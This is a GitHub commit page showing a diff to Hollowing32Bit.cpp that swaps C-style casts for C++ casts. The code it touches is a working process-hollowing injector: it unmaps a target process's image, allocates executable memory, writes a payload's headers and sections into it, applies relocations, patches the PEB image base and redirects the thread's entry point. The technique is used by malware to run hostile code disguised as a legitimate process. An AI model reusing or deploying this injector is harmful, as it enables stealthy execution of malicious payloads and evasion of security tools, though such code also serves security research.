Skip to content

Commit

Permalink
Switch from C casts to C++ casts
Browse files Browse the repository at this point in the history
  • Loading branch information
@ivkin25
ivkin25 committed Nov 20, 2020
1 parent c94ac30 commit 7019887
Show file tree
Hide file tree
Showing 3 changed files with 109 additions and 108 deletions.
86 changes: 43 additions & 43 deletions Hollowing32Bit.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -23,18 +23,18 @@ void Hollowing32Bit::hollow()

PEB32 targetPEB = Read32BitProcessPEB(_targetProcessInformation.hProcess);

IMAGE_DOS_HEADER payloadDOSHeader = *((PIMAGE_DOS_HEADER)_payloadBuffer);
IMAGE_NT_HEADERS32 payloadNTHeaders = *((PIMAGE_NT_HEADERS32)(_payloadBuffer + payloadDOSHeader.e_lfanew));
const PIMAGE_DOS_HEADER payloadDOSHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(_payloadBuffer);
const PIMAGE_NT_HEADERS32 payloadNTHeaders = reinterpret_cast<PIMAGE_NT_HEADERS32>(_payloadBuffer + payloadDOSHeader->e_lfanew);

std::cout << "SectionAlignment: " << std::hex << payloadNTHeaders.OptionalHeader.SectionAlignment << std::endl;
std::cout << "SectionAlignment: " << std::hex << payloadNTHeaders->OptionalHeader.SectionAlignment << std::endl;

if (0 != NtdllFunctions::_NtUnmapViewOfSection(_targetProcessInformation.hProcess, (PVOID)targetPEB.ImageBaseAddress))
if (0 != NtdllFunctions::_NtUnmapViewOfSection(_targetProcessInformation.hProcess, reinterpret_cast<PVOID>(targetPEB.ImageBaseAddress)))
{
std::cout << "206" << std::endl;
// Exception
}
PVOID targetNewBaseAddress = VirtualAllocEx(_targetProcessInformation.hProcess, (PVOID)targetPEB.ImageBaseAddress,
payloadNTHeaders.OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
PVOID targetNewBaseAddress = VirtualAllocEx(_targetProcessInformation.hProcess, reinterpret_cast<PVOID>(targetPEB.ImageBaseAddress),
payloadNTHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (nullptr == targetNewBaseAddress)
{
std::cout << "202 Error Code: " << GetLastError() << std::endl;
Expand All @@ -44,9 +44,9 @@ void Hollowing32Bit::hollow()

WriteTargetProcessHeaders(targetNewBaseAddress, _payloadBuffer);

UpdateTargetProcessEntryPoint(((LPBYTE)targetNewBaseAddress + payloadNTHeaders.OptionalHeader.AddressOfEntryPoint));
UpdateTargetProcessEntryPoint(reinterpret_cast<PBYTE>(targetNewBaseAddress) + payloadNTHeaders->OptionalHeader.AddressOfEntryPoint);

DWORD delta = (intptr_t)targetNewBaseAddress - payloadNTHeaders.OptionalHeader.ImageBase;
DWORD delta = reinterpret_cast<intptr_t>(targetNewBaseAddress) - payloadNTHeaders->OptionalHeader.ImageBase;
std::cout << "Delta: " << std::hex << delta << std::endl;
if (0 != delta)
{
Expand All @@ -63,39 +63,38 @@ void Hollowing32Bit::hollow()

void Hollowing32Bit::WriteTargetProcessHeaders(PVOID targetBaseAddress, PBYTE sourceFileContents)
{
IMAGE_DOS_HEADER sourceDOSHeader = *((PIMAGE_DOS_HEADER)sourceFileContents);
IMAGE_NT_HEADERS32 sourceNTHeaders = *((PIMAGE_NT_HEADERS32)(sourceFileContents + sourceDOSHeader.e_lfanew));
const PIMAGE_DOS_HEADER sourceDOSHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(sourceFileContents);
const PIMAGE_NT_HEADERS32 sourceNTHeaders = reinterpret_cast<PIMAGE_NT_HEADERS32>(sourceFileContents + sourceDOSHeader->e_lfanew);

sourceNTHeaders.OptionalHeader.ImageBase = (intptr_t)targetBaseAddress;

CopyMemory(sourceFileContents + sourceDOSHeader.e_lfanew, &sourceNTHeaders, sizeof(sourceNTHeaders));

std::cout << "Writing headers" << std::endl;
DWORD oldProtection = 0;
SIZE_T writtenBytes = 0;
if (0 == WriteProcessMemory(_targetProcessInformation.hProcess, targetBaseAddress, sourceFileContents,
sourceNTHeaders.OptionalHeader.SizeOfHeaders, &writtenBytes) || writtenBytes != sourceNTHeaders.OptionalHeader.SizeOfHeaders)
sourceNTHeaders->OptionalHeader.SizeOfHeaders, &writtenBytes) || 0 == writtenBytes)
{
std::cout << "213" << std::endl;
}
if (0 == writtenBytes)
// Updating the ImageBase field
if(0 == WriteProcessMemory(_targetProcessInformation.hProcess, reinterpret_cast<LPBYTE>(targetBaseAddress) + sourceDOSHeader->e_lfanew +
offsetof(IMAGE_NT_HEADERS32, OptionalHeader) + offsetof(IMAGE_OPTIONAL_HEADER32, ImageBase), &targetBaseAddress,
sizeof(DWORD), &writtenBytes) || 0 == writtenBytes)
{
std::cout << "130" << std::endl;
std::cout << "82" << std::endl;
}
VirtualProtectEx(_targetProcessInformation.hProcess, targetBaseAddress, sourceNTHeaders.OptionalHeader.SizeOfHeaders,
VirtualProtectEx(_targetProcessInformation.hProcess, targetBaseAddress, sourceNTHeaders->OptionalHeader.SizeOfHeaders,
PAGE_READONLY, &oldProtection);

for (int i = 0; i < sourceNTHeaders.FileHeader.NumberOfSections; i++)
for (int i = 0; i < sourceNTHeaders->FileHeader.NumberOfSections; i++)
{
PIMAGE_SECTION_HEADER currentSection = (PIMAGE_SECTION_HEADER)(sourceFileContents + sourceDOSHeader.e_lfanew +
PIMAGE_SECTION_HEADER currentSection = reinterpret_cast<PIMAGE_SECTION_HEADER>(sourceFileContents + sourceDOSHeader->e_lfanew +
sizeof(IMAGE_NT_HEADERS32) + (i * sizeof(IMAGE_SECTION_HEADER)));

printf("Writing %s\n", currentSection->Name);
NtdllFunctions::_NtWriteVirtualMemory(_targetProcessInformation.hProcess, (PVOID)((LPBYTE)targetBaseAddress +
currentSection->VirtualAddress), (PVOID)(sourceFileContents + currentSection->PointerToRawData),
NtdllFunctions::_NtWriteVirtualMemory(_targetProcessInformation.hProcess, reinterpret_cast<LPBYTE>(targetBaseAddress) +
currentSection->VirtualAddress, (sourceFileContents + currentSection->PointerToRawData),
currentSection->SizeOfRawData, nullptr);

VirtualProtectEx(_targetProcessInformation.hProcess, targetBaseAddress, sourceNTHeaders.OptionalHeader.SizeOfHeaders,
VirtualProtectEx(_targetProcessInformation.hProcess, targetBaseAddress, sourceNTHeaders->OptionalHeader.SizeOfHeaders,
SectionCharacteristicsToMemoryProtections(currentSection->Characteristics), &oldProtection);
}
}
Expand All @@ -111,7 +110,7 @@ void Hollowing32Bit::UpdateTargetProcessEntryPoint(PVOID newEntryPointAddress)
// Exception
}

threadContext.Eax = (intptr_t)newEntryPointAddress;
threadContext.Eax = reinterpret_cast<intptr_t>(newEntryPointAddress);

if (0 == Wow64SetThreadContext(_targetProcessInformation.hThread, &threadContext))
{
Expand All @@ -121,8 +120,8 @@ void Hollowing32Bit::UpdateTargetProcessEntryPoint(PVOID newEntryPointAddress)

PIMAGE_DATA_DIRECTORY Hollowing32Bit::GetPayloadDirectoryEntry(DWORD directoryID)
{
PIMAGE_DOS_HEADER payloadDOSHeader = (PIMAGE_DOS_HEADER)_payloadBuffer;
PIMAGE_NT_HEADERS32 payloadNTHeaders = (PIMAGE_NT_HEADERS32)(_payloadBuffer + payloadDOSHeader->e_lfanew);
PIMAGE_DOS_HEADER payloadDOSHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(_payloadBuffer);
PIMAGE_NT_HEADERS32 payloadNTHeaders = reinterpret_cast<PIMAGE_NT_HEADERS32>(_payloadBuffer + payloadDOSHeader->e_lfanew);

return &(payloadNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]);
}
Expand All @@ -131,29 +130,28 @@ PIMAGE_SECTION_HEADER Hollowing32Bit::FindTargetProcessSection(const std::string
{
IMAGE_DOS_HEADER payloadDOSHeader = *((PIMAGE_DOS_HEADER)_payloadBuffer);
IMAGE_NT_HEADERS32 payloadNTHeaders = *((PIMAGE_NT_HEADERS32)(_payloadBuffer + payloadDOSHeader.e_lfanew));
BYTE maxNameLengthHolder[IMAGE_SIZEOF_SHORT_NAME + 1] = { 0 }; // According to WinAPI, the name of the section can
char maxNameLengthHolder[IMAGE_SIZEOF_SHORT_NAME + 1] = { 0 }; // According to WinAPI, the name of the section can
// be as long as the size of the buffer, which means
// it won't always have a terminating null byte, so
// we include a spot for one at the end by ourselves.
int i = 0;

for (i = 0; i < payloadNTHeaders.FileHeader.NumberOfSections; i++)
for (int i = 0; i < payloadNTHeaders.FileHeader.NumberOfSections; i++)
{
PIMAGE_SECTION_HEADER currentSectionHeader = (PIMAGE_SECTION_HEADER)(_payloadBuffer + payloadDOSHeader.e_lfanew +
PIMAGE_SECTION_HEADER currentSectionHeader = reinterpret_cast<PIMAGE_SECTION_HEADER>(_payloadBuffer + payloadDOSHeader.e_lfanew +
sizeof(IMAGE_NT_HEADERS32) + (i * sizeof(IMAGE_SECTION_HEADER)));

if (0 != currentSectionHeader->Name[IMAGE_SIZEOF_SHORT_NAME - 1])
{
strncpy((char*)maxNameLengthHolder, (char*)currentSectionHeader->Name, IMAGE_SIZEOF_SHORT_NAME);
strncpy(maxNameLengthHolder, reinterpret_cast<char*>(currentSectionHeader->Name), IMAGE_SIZEOF_SHORT_NAME);
}
else
{
int nameLength = strlen((char*)currentSectionHeader->Name);
strncpy((char*)maxNameLengthHolder, (char*)currentSectionHeader->Name, nameLength);
int nameLength = strlen(reinterpret_cast<char*>(currentSectionHeader->Name));
strncpy(maxNameLengthHolder, reinterpret_cast<char*>(currentSectionHeader->Name), nameLength);
maxNameLengthHolder[nameLength] = 0;
}

if (0 == strcmp(sectionName.c_str(), (char*)maxNameLengthHolder))
if (0 == strcmp(sectionName.c_str(), maxNameLengthHolder))
{
return currentSectionHeader;
}
Expand All @@ -173,9 +171,9 @@ void Hollowing32Bit::RelocateTargetProcess(ULONGLONG baseAddressesDelta, PVOID p

while (dwOffset < relocData->Size)
{
PBASE_RELOCATION_BLOCK pBlockHeader = (PBASE_RELOCATION_BLOCK)&_payloadBuffer[dwRelocAddr + dwOffset];
PBASE_RELOCATION_BLOCK pBlockHeader = reinterpret_cast<PBASE_RELOCATION_BLOCK>(&_payloadBuffer[dwRelocAddr + dwOffset]);
DWORD dwEntryCount = CountRelocationEntries(pBlockHeader->BlockSize);
PBASE_RELOCATION_ENTRY pBlocks = (PBASE_RELOCATION_ENTRY)&_payloadBuffer[dwRelocAddr + dwOffset + sizeof(BASE_RELOCATION_BLOCK)];
PBASE_RELOCATION_ENTRY pBlocks = reinterpret_cast<PBASE_RELOCATION_ENTRY>(&_payloadBuffer[dwRelocAddr + dwOffset + sizeof(BASE_RELOCATION_BLOCK)]);

ProcessTargetRelocationBlock(pBlockHeader, pBlocks, processBaseAddress, baseAddressesDelta);

Expand All @@ -190,21 +188,22 @@ void Hollowing32Bit::ProcessTargetRelocationBlock(PBASE_RELOCATION_BLOCK baseRel

for (DWORD i = 0; i < entriesAmount; i++)
{
if (0 != blockEntries[i].Type)
// The base relocation is skipped. This type can be used to pad a block.
if (IMAGE_REL_BASED_ABSOLUTE != blockEntries[i].Type)
{
DWORD dwFieldAddress = baseRelocationBlock->PageAddress + blockEntries[i].Offset;
DWORD dwBuffer = 0;
SIZE_T readBytes = 0;
if(0 == ReadProcessMemory(_targetProcessInformation.hProcess, (PVOID)((intptr_t)processBaseAddress + dwFieldAddress),
if(0 == ReadProcessMemory(_targetProcessInformation.hProcess, (reinterpret_cast<PBYTE>(processBaseAddress) + dwFieldAddress),
&dwBuffer, sizeof(dwBuffer), &readBytes) || sizeof(dwBuffer) != readBytes)
{
std::cout << "264 Error Code:" << GetLastError() << std::endl;
}

dwBuffer += (DWORD)baseAddressesDelta;
dwBuffer += static_cast<DWORD>(baseAddressesDelta);

SIZE_T writtenBytes = 0;
if (0 == WriteProcessMemory(_targetProcessInformation.hProcess, (PVOID)((intptr_t)processBaseAddress + dwFieldAddress),
if (0 == WriteProcessMemory(_targetProcessInformation.hProcess, (reinterpret_cast<PBYTE>(processBaseAddress) + dwFieldAddress),
&dwBuffer, sizeof(dwBuffer), &writtenBytes) || sizeof(dwBuffer) != writtenBytes)
{
std::cout << "265 Error Code: " << GetLastError() << std::endl;
Expand All @@ -226,7 +225,8 @@ void Hollowing32Bit::UpdateBaseAddressInTargetPEB(PVOID processNewBaseAddress)

SIZE_T writtenBytes = 0;
std::cout << "Offset: " << offsetof(PEB32, ImageBaseAddress) << std::endl;
if (0 == WriteProcessMemory(_targetProcessInformation.hProcess, (PVOID)(threadContext.Ebx + offsetof(PEB32, ImageBaseAddress)), &processNewBaseAddress, sizeof(DWORD), &writtenBytes) || sizeof(DWORD) != writtenBytes)
if (0 == WriteProcessMemory(_targetProcessInformation.hProcess, reinterpret_cast<PVOID>(threadContext.Ebx + offsetof(PEB32, ImageBaseAddress)),
&processNewBaseAddress, sizeof(DWORD), &writtenBytes) || sizeof(DWORD) != writtenBytes)
{
std::cout << "303" << std::endl;
}
Expand All @@ -241,8 +241,8 @@ ULONG Hollowing32Bit::GetProcessSubsystem(HANDLE process)

WORD Hollowing32Bit::GetPEFileSubsystem(const PBYTE fileBuffer)
{
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)fileBuffer;
PIMAGE_NT_HEADERS64 ntHeaders = (PIMAGE_NT_HEADERS64)(fileBuffer + dosHeader->e_lfanew);
PIMAGE_DOS_HEADER dosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(fileBuffer);
PIMAGE_NT_HEADERS64 ntHeaders = reinterpret_cast<PIMAGE_NT_HEADERS64>(fileBuffer + dosHeader->e_lfanew);

return ntHeaders->OptionalHeader.Subsystem;
}
Expand Down
Loading

0 comments on commit 7019887

Please sign in to comment.